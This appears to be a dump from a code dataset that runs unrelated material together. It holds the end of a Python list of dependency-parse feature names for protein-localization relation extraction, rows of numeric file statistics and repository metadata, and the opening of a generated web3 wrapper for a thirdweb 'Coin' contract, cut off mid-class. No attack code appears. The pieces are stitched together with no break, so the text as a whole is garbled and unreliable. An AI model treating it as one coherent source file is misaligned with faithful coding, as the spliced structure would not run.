"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<ADP ~~ NOUN ~~ VERB>_[0]", # 67
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<NOUN ~~ VERB ~~ NOUN>_[0]", # 68
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<ADP ~~ NOUN ~~ TARGET]>_[0]", # 69
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<, ~~ and>_[0]", # 70
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADJ ~~ TARGET]>_[0]", # 71
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<relcl>_[0]", # 72
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<e_3>_[0]", # 73
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PROPN ~~ PROPN>_[0]", # 74
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PROPN ~~ PUNCT ~~ PROPN>_[0]", # 75
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_1 ~~ and>_[0]", # 76
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<VERB ~~ PROPN>_[0]", # 77
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<with ~~ e_1>_[0]", # 78
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_1 ~~ at>_[0]", # 79
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ and>_[0]", # 80
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ CONJ>_[0]", # 81
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<[SOURCE ~~ ADP>_[0]", # 82
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ ADP>_[0]", # 83
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<small>_[0]", # 84
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<VERB ~~ VERB>_[0]", # 85
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ NOUN ~~ TARGET]>_[0]", # 86
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<transporter>_[0]", # 87
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<that>_[0]", # 88
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PUNCT ~~ NUM>_[0]", # 89
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADV ~~ VERB>_[0]", # 90
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<, ~~ e_1 ~~ e_1>_[0]", # 91
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ CONJ ~~ PROPN>_[0]", # 92
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ NOUN ~~ NUM>_[0]", # 93
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NUM ~~ PUNCT ~~ NUM>_[0]", # 94
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<nsubjpass>_[0]", # 95
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<PROPN ~~ VERB>_[0]", # 96
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ PUNCT ~~ NOUN>_[0]", # 97
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<[SOURCE ~~ NOUN ~~ VERB>_[0]", # 98
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<( ~~ NUM>_[0]", # 99
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADP ~~ TARGET]>_[0]", # 100
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<like>_[0]", # 101
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<NUM ~~ VERB>_[0]", # 102
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ of>_[0]", # 103
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<ccomp ~~ dobj>_[0]", # 104
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ VERB ~~ DET>_[0]", # 105
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<associate>_[0]", # 106
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<( ~~ e_1>_[0]", # 107
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_1 ~~ )>_[0]", # 108
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<( ~~ e_1 ~~ e_1>_[0]", # 109
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ ADP ~~ TARGET]>_[0]", # 110
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<compound ~~ compound>_[0]", # 111
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<appos ~~ prep ~~ pobj>_[0]", # 112
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<ADP ~~ ADJ ~~ TARGET]>_[0]", # 113
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<prep ~~ advcl>_[0]", # 114
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PUNCT ~~ TARGET]>_[0]", # 115
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ NOUN ~~ CONJ>_[0]", # 116
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<prep ~~ advmod>_[0]", # 117
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<pobj ~~ prep ~~ advmod>_[0]", # 118
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PROPN ~~ VERB>_[0]", # 119
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<expression>_[0]", # 120
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<CONJ ~~ ADJ>_[0]", # 121
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<CONJ ~~ DET ~~ NOUN>_[0]", # 122
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<conj ~~ dobj ~~ prep>_[0]", # 123
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ protein>_[0]", # 124
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<protein ~~ be>_[0]", # 125
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<VERB ~~ NOUN ~~ TARGET]>_[0]", # 126
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<to ~~ the>_[0]", # 127
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<e_1 ~~ localize>_[0]", # 128
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<nsubj ~~ dobj>_[0]", # 129
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<nsubj ~~ dobj ~~ prep>_[0]", # 130
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<dobj ~~ acl>_[0]", # 131
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ TARGET]>_[0]", # 132
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ VERB ~~ ADJ>_[0]", # 133
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ - ~~ NUM>_[0]", # 134
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<VERB ~~ ADP ~~ ADJ>_[0]", # 135
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ PUNCT ~~ ADP>_[0]", # 136
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ ADP ~~ NOUN>_[0]", # 137
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ NOUN ~~ PROPN>_[0]", # 138
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PROPN ~~ ADP ~~ TARGET]>_[0]", # 139
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ e_1>_[0]", # 140
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ e_1 ~~ e_1>_[0]", # 141
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ for ~~ formation>_[0]", # 142
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ TARGET]>_[0]", # 143
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ TARGET]>_[0]", # 144
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<require>_[0]", # 145
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<a ~~ e_1>_[0]", # 146
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<require ~~ to>_[0]", # 147
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<a ~~ e_1 ~~ e_1>_[0]", # 148
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ require>_[0]", # 149
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<protein ~~ TARGET]>_[0]", # 150
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ protein ~~ TARGET]>_[0]", # 151
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<modulates>_[0]", # 152
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<find>_[0]", # 153
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<be ~~ protein>_[0]", # 154
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<induce>_[0]", # 155
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<ADP ~~ ADP ~~ TARGET]>_[0]", # 156
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<of ~~ TARGET]>_[0]", # 157
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<dobj ~~ advcl ~~ dobj>_[0]", # 158
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ VERB ~~ ADV>_[0]", # 159
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ require>_[0]", # 160
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<e_1 ~~ e_1 ~~ be>_[0]", # 161
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ require ~~ for>_[0]", # 162
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<have ~~ TARGET]>_[0]", # 163
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<bipolarize>_[0]", # 164
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<e_2 ~~ and ~~ TARGET]>_[0]", # 165
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ CONJ ~~ TARGET]>_[0]", # 166
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<implicate>_[0]", # 167
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<regulation ~~ of>_[0]", # 168
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ , ~~ which>_[0]", # 169
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<of ~~ e_1>_[0]", # 170
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<of ~~ e_1 ~~ e_1>_[0]", # 171
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<use>_[0]", # 172
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<ccomp ~~ nsubjpass>_[0]", # 173
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<dobj ~~ pcomp>_[0]", # 174
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<but>_[0]", # 175
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<mediate>_[0]", # 176
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<compound ~~ prep>_[0]", # 177
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<of ~~ ubiquitination ~~ at>_[0]", # 178
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NUM ~~ NOUN ~~ ADP>_[0]", # 179
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<within>_[0]", # 180
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ from>_[0]", # 181
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<into ~~ TARGET]>_[0]", # 182
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ the>_[0]", # 183
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<import ~~ into>_[0]", # 184
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<dobj ~~ conj>_[0]", # 185
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<this>_[0]", # 186
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<effect ~~ on>_[0]", # 187
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ locate>_[0]", # 188
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<, ~~ such ~~ as>_[0]", # 189
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<receptor>_[0]", # 190
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<dobj ~~ nmod>_[0]", # 191
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<ccomp ~~ nsubj>_[0]", # 192
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<be ~~ associate>_[0]", # 193
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<acomp ~~ npadvmod>_[0]", # 194
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ dispensable>_[0]", # 195
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ VERB ~~ ADJ>_[0]", # 196
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_1 ~~ to>_[0]", # 197
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<show>_[0]", # 198
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ e_1 ~~ TARGET]>_[0]", # 199
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<VERB ~~ ADJ ~~ TARGET]>_[0]", # 200
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<segment>_[0]", # 201
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ segment>_[0]", # 202
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<segment ~~ in>_[0]", # 203
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ segment ~~ in>_[0]", # 204
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<segment ~~ in ~~ TARGET]>_[0]", # 205
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<segment>_[0]", # 206
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ segment>_[0]", # 207
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<segment ~~ in>_[0]", # 208
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ segment ~~ in>_[0]", # 209
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<segment ~~ in ~~ TARGET]>_[0]", # 210
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<, ~~ to>_[0]", # 211
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ ADV ~~ NUM>_[0]", # 212
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<block>_[0]", # 213
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<in ~~ cis>_[0]", # 214
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<domain ~~ TARGET]>_[0]", # 215
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<translocation>_[0]", # 216
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<compound ~~ nsubjpass>_[0]", # 217
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ at ~~ TARGET]>_[0]", # 218
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_2 ~~ TARGET]>_[0]", # 219
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<important ~~ for ~~ TARGET]>_[0]", # 220
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<for ~~ function ~~ TARGET]>_[0]", # 221
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<prep ~~ pobj ~~ nsubj>_[0]", # 222
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<conversely>_[0]", # 223
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<function ~~ and ~~ ,>_[0]", # 224
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<and ~~ , ~~ conversely>_[0]", # 225
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<morphology>_[0]", # 226
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<gfp>_[0]", # 227
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ localization ~~ at>_[0]", # 228
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<cohesin>_[0]", # 229
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<vesicle>_[0]", # 230
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<vesicle>_[0]", # 231
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ vesicle>_[0]", # 232
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ significantly>_[0]", # 233
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ at ~~ have>_[0]", # 234
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ domain ~~ of>_[0]", # 235
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ domain ~~ of>_[0]", # 236
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<domain ~~ (>_[0]", # 237
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ domain ~~ (>_[0]", # 238
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<domain ~~ ( ~~ TARGET]>_[0]", # 239
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<- ~~ mediate>_[0]", # 240
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ proliferation>_[0]", # 241
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ - ~~ mediate>_[0]", # 242
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ proliferation ~~ TARGET]>_[0]", # 243
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<nmod ~~ compound>_[0]", # 244
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<expression ~~ induce ~~ promote>_[0]", # 245
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<abundance ~~ TARGET]>_[0]", # 246
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ PART ~~ VERB>_[0]", # 247
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<eliminate ~~ from ~~ TARGET]>_[0]", # 248
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<- ~~ activate ~~ TARGET]>_[0]", # 249
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<VERB ~~ PROPN ~~ NOUN>_[0]", # 250
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<compound ~~ compound ~~ amod>_[0]", # 251
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<appos ~~ nsubj ~~ dobj>_[0]", # 252
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<that ~~ u>_[0]", # 253
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<protein ~~ localize ~~ to>_[0]", # 254
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<nmod ~~ nsubj ~~ prep>_[0]", # 255
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ locate>_[0]", # 256
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ locate ~~ in>_[0]", # 257
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<designate>_[0]", # 258
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<gtpase>_[0]", # 259
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ to ~~ mediate>_[0]", # 260
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ - ~~ dependent>_[0]", # 261
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ constriction>_[0]", # 262
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ constriction ~~ TARGET]>_[0]", # 263
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<effect>_[0]", # 264
"IsSpecificProteinType::41_is_enzyme_[0]", # 265
"LocalizationRelationsRatios::50_corpus_unnormalized_total_background_loc_rels_ratios_[0]", # 266
"LocalizationRelationsRatios::58_SwissProt_normalized_exists_relation_[0]", # 267
]
| 85.944649
| 111
| 0.736379
| 3,284
| 23,291
| 4.553593
| 0.122412
| 0.087936
| 0.072556
| 0.198609
| 0.809282
| 0.801324
| 0.801324
| 0.800388
| 0.537181
| 0.181156
| 0
| 0.087338
| 0.118071
| 23,291
| 270
| 112
| 86.262963
| 0.64067
| 0.041261
| 0
| 0
| 0
| 0
| 0.878337
| 0.714247
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.011111
| 0.007407
| 0
| 0.007407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
84f8001f4df51bf70b69cb7ca918fb51c5fd6c68
| 116,152
|
py
|
Python
|
thirdweb/abi/coin/__init__.py
|
princetonwong/python-sdk
|
f35181d97620e29d055498fca75f3702f3bb2449
|
[
"Apache-2.0"
] | 1
|
2022-02-18T16:59:12.000Z
|
2022-02-18T16:59:12.000Z
|
thirdweb/abi/coin/__init__.py
|
princetonwong/python-sdk
|
f35181d97620e29d055498fca75f3702f3bb2449
|
[
"Apache-2.0"
] | null | null | null |
thirdweb/abi/coin/__init__.py
|
princetonwong/python-sdk
|
f35181d97620e29d055498fca75f3702f3bb2449
|
[
"Apache-2.0"
] | null | null | null |
"""Generated wrapper for Coin Solidity contract."""
# pylint: disable=too-many-arguments
import json
from typing import ( # pylint: disable=unused-import
Any,
List,
Optional,
Tuple,
Union,
)
from eth_utils import to_checksum_address
from mypy_extensions import TypedDict # pylint: disable=unused-import
from hexbytes import HexBytes
from thirdweb_web3 import Web3
from thirdweb_web3.contract import ContractFunction
from thirdweb_web3.datastructures import AttributeDict
from thirdweb_web3.providers.base import BaseProvider
from zero_ex.contract_wrappers.bases import ContractMethod, Validator
from zero_ex.contract_wrappers.tx_params import TxParams
# Try to import a custom validator class definition; if there isn't one,
# declare one that we can instantiate for the default argument to the
# constructor for Coin below.
try:
    # both mypy and pylint complain about what we're doing here, but this
    # works just fine, so their messages have been disabled here.
    from . import (  # type: ignore # pylint: disable=import-self
        CoinValidator,
    )
except ImportError:
    class CoinValidator(  # type: ignore
        Validator
    ):
        """No-op input validator."""
# Optionally pull in a package-provided MIDDLEWARE definition; absence is
# fine and silently ignored. NOTE(review): MIDDLEWARE is not referenced in
# this chunk — presumably consumed elsewhere in the package; verify.
try:
    from .middleware import MIDDLEWARE  # type: ignore
except ImportError:
    pass
class DefaultAdminRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the DEFAULT_ADMIN_ROLE method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider to route requests through
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction for DEFAULT_ADMIN_ROLE
        """
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the value as returned by web3 (annotated bytes or str).
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # Bug fix: the generated code did `return Union[bytes, str](returned)`.
        # typing.Union is a special form and is not callable, so that line
        # raised `TypeError: Cannot instantiate typing.Union` on every call.
        # The web3 return value already satisfies the annotation; pass it through.
        return returned

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        :returns: the transaction hash.
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class DomainSeparatorMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the DOMAIN_SEPARATOR method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider to route requests through
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction for DOMAIN_SEPARATOR
        """
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the value as returned by web3 (annotated bytes or str).
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # Bug fix: the generated code did `return Union[bytes, str](returned)`.
        # typing.Union is a special form and is not callable, so that line
        # raised `TypeError: Cannot instantiate typing.Union` on every call.
        # The web3 return value already satisfies the annotation; pass it through.
        return returned

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        :returns: the transaction hash.
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class MinterRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the MINTER_ROLE method."""

    def __init__(self, web3_or_provider: Union[Web3, BaseProvider], contract_address: str, contract_function: ContractFunction):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider to route requests through
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction for MINTER_ROLE
        """
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the value as returned by web3 (annotated bytes or str).
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # Bug fix: the generated code did `return Union[bytes, str](returned)`.
        # typing.Union is a special form and is not callable, so that line
        # raised `TypeError: Cannot instantiate typing.Union` on every call.
        # The web3 return value already satisfies the annotation; pass it through.
        return returned

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        :returns: the transaction hash.
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class PauserRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the PAUSER_ROLE method."""

